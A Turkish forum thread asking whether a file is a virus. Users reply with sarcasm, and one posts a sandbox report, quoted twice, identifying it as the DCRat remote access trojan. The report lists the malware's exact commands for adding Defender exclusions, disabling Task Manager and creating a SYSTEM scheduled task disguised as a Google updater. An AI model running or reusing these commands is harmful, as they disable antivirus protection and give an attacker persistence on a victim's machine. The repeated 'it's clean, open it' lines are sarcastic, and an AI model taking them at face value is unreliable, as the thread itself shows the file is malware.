Çözüldü BU DOSYA VİRÜS MÜ ?
- Konuyu başlatanasppera
- Başlangıç tarihi
- Katılım
- 11 Haz 2022
- Mesajlar
- 346
- Beğeniler
- 134
- İletişim
yok
lyrixwx
Diamond Üye
- Katılım
- 21 Ocak 2024
- Mesajlar
- 383
- Beğeniler
- 115
- İletişim
benim içim gibi tertemiz hocam
- Katılım
- 28 May 2023
- Mesajlar
- 768
- Beğeniler
- 131
- İletişim
Kesinlikle tertemiz bir dosya [aman açmayın]
wqc
Diamond Üye
- Katılım
- 5 Eki 2024
- Mesajlar
- 399
- Beğeniler
- 70
- İletişim
Sakın açma backdoor, trojan Allah ne verdiyse koymuşlar aw
emrose
Diamond Üye
- Katılım
- 13 Şub 2023
- Mesajlar
- 257
- Beğeniler
- 16
Threat categories
arka kısımda belirli bir dosya indiriyor ve
Matches rule System File Execution Location Anomaly by Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali (Nextron Systems) at Sigma Integrated Rule Set (GitHub)
Detects the execution of a Windows system binary that is usually located in the system folder from an uncommon location.
Matches rule Powershell Defender Exclusion by Florian Roth (Nextron Systems) at Sigma Integrated Rule Set (GitHub)
Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets
Matches rule Files With System Process Name In Unsuspected Locations by Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) at Sigma Integrated Rule Set (GitHub)
Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64, etc.). It is highly recommended to perform an initial baseline before using this rule in production.
Powershell komutlarını kullanarak dosyanın anti virüs taramalarına girmemesini "dışlama" ekleyerek yapıyor bunun harici kullandığı rat DCRat adı altındaki bir rat:
Kendisini conhost.exe olarak saklıyor bunun yanı sıra kayıt defterine task managerın devre dışı bırakılmasını ekliyor bunun yanı sıra:
Linkleri görebilmek için kayıt olmanız gerekmektedir
an d
Linkleri görebilmek için kayıt olmanız gerekmektedir
arka kısımda belirli bir dosya indiriyor ve
Matches rule System File Execution Location Anomaly by Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali (Nextron Systems) at Sigma Integrated Rule Set (GitHub)
Detects the execution of a Windows system binary that is usually located in the system folder from an uncommon location.
Matches rule Powershell Defender Exclusion by Florian Roth (Nextron Systems) at Sigma Integrated Rule Set (GitHub)
Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets
Matches rule Files With System Process Name In Unsuspected Locations by Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) at Sigma Integrated Rule Set (GitHub)
Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64, etc.). It is highly recommended to perform an initial baseline before using this rule in production.
Powershell komutlarını kullanarak dosyanın anti virüs taramalarına girmemesini "dışlama" ekleyerek yapıyor bunun harici kullandığı rat DCRat adı altındaki bir rat:
Shell commands
"%TEMP%\DCRatBuild.exe"
"%TEMP%\conhost.exe"
"%windir%\System32\WScript.exe" "C:\chainReviewdriverrefdll\27kbP.vbe"
"C:\chainReviewdriverrefdll/refsvc.exe"
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
"pwsh.exe" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
"pwsh.exe" -Command Add-MpPreference -ExclusionPath 'C:/'
%ComSpec% /c ""C:\chainReviewdriverrefdll\fPIlZ4O0J3oHQ7um4YDamSwvJxyLw9.bat" "
%SAMPLEPATH%
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
Kendisini conhost.exe olarak saklıyor bunun yanı sıra kayıt defterine task managerın devre dışı bırakılmasını ekliyor bunun yanı sıra:
Processes terminated
"%ProgramFiles%\Reference Assemblies\Microsoft\Framework\WmiPrvSE.exe"
"%TEMP%\DCRatBuild.exe"
"%TEMP%\conhost.exe"
"%windir%\System32\WScript.exe" "C:\chainReviewdriverrefdll\27kbP.vbe"
"%windir%\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'%ProgramFiles%\Google\Chrome\updater.exe'"
"C:\chainReviewdriverrefdll\Locator.exe"
"pwsh.exe" <#lzobqvj#> IF([System.Environment]::OSVersion.Version -lt [System.Version]6.2) { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''%ProgramFiles%\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute '%ProgramFiles%\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
"pwsh.exe" Add-MpPreference -ExclusionPath @($env:UserProfile, $env
rogramFiles) -Force
%CONHOST% "-1266940458-17335340-1518105338910493253-608344605-7787320912037000132-1684900487
%CONHOST% "-1434966407198493380819154042713101279201702738274-1982168120-1176223887-1470849373
Programfiles'a indirme yaptığı için programfiles klasörünü direkt olarak windows defender dışlamasına ekliyor
ama özetle,bence gayet temiz açabilirsin
lyrixwx
Diamond Üye
- Katılım
- 21 Ocak 2024
- Mesajlar
- 383
- Beğeniler
- 115
- İletişim
bu ne hocamThreat categories
Linkleri görebilmek için kayıt olmanız gerekmektediran dLinkleri görebilmek için kayıt olmanız gerekmektedir
arka kısımda belirli bir dosya indiriyor ve
Matches rule System File Execution Location Anomaly by Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali (Nextron Systems) at Sigma Integrated Rule Set (GitHub)
Detects the execution of a Windows system binary that is usually located in the system folder from an uncommon location.
Matches rule Powershell Defender Exclusion by Florian Roth (Nextron Systems) at Sigma Integrated Rule Set (GitHub)
Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets
Matches rule Files With System Process Name In Unsuspected Locations by Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) at Sigma Integrated Rule Set (GitHub)
Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64, etc.). It is highly recommended to perform an initial baseline before using this rule in production.
Powershell komutlarını kullanarak dosyanın anti virüs taramalarına girmemesini "dışlama" ekleyerek yapıyor bunun harici kullandığı rat DCRat adı altındaki bir rat:
Shell commands
"%TEMP%\DCRatBuild.exe"
"%TEMP%\conhost.exe"
"%windir%\System32\WScript.exe" "C:\chainReviewdriverrefdll\27kbP.vbe"
"C:\chainReviewdriverrefdll/refsvc.exe"
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
"pwsh.exe" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
"pwsh.exe" -Command Add-MpPreference -ExclusionPath 'C:/'
%ComSpec% /c ""C:\chainReviewdriverrefdll\fPIlZ4O0J3oHQ7um4YDamSwvJxyLw9.bat" "
%SAMPLEPATH%
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
Kendisini conhost.exe olarak saklıyor bunun yanı sıra kayıt defterine task managerın devre dışı bırakılmasını ekliyor bunun yanı sıra:
Processes terminated
"%ProgramFiles%\Reference Assemblies\Microsoft\Framework\WmiPrvSE.exe"
"%TEMP%\DCRatBuild.exe"
"%TEMP%\conhost.exe"
"%windir%\System32\WScript.exe" "C:\chainReviewdriverrefdll\27kbP.vbe"
"%windir%\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'%ProgramFiles%\Google\Chrome\updater.exe'"
"C:\chainReviewdriverrefdll\Locator.exe"
"pwsh.exe" <#lzobqvj#> IF([System.Environment]::OSVersion.Version -lt [System.Version]6.2) { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''%ProgramFiles%\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute '%ProgramFiles%\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
"pwsh.exe" Add-MpPreference -ExclusionPath @($env:UserProfile, $env
%CONHOST% "-1266940458-17335340-1518105338910493253-608344605-7787320912037000132-1684900487
%CONHOST% "-1434966407198493380819154042713101279201702738274-1982168120-1176223887-1470849373
Programfiles'a indirme yaptığı için programfiles klasörünü direkt olarak windows defender dışlamasına ekliyor
ama özetle,bence gayet temiz açabilirsin
- Katılım
- 28 Ara 2019
- Mesajlar
- 273
- Beğeniler
- 44
- Yaş
- 18
- İletişim
evet
wyxreez
Uzman Üye
- Katılım
- 19 May 2024
- Mesajlar
- 727
- Beğeniler
- 175
- İletişim
dedemin sigara içmekten oluşan akciğerindeki tabaka gibi temiz kullan hocam
- Durum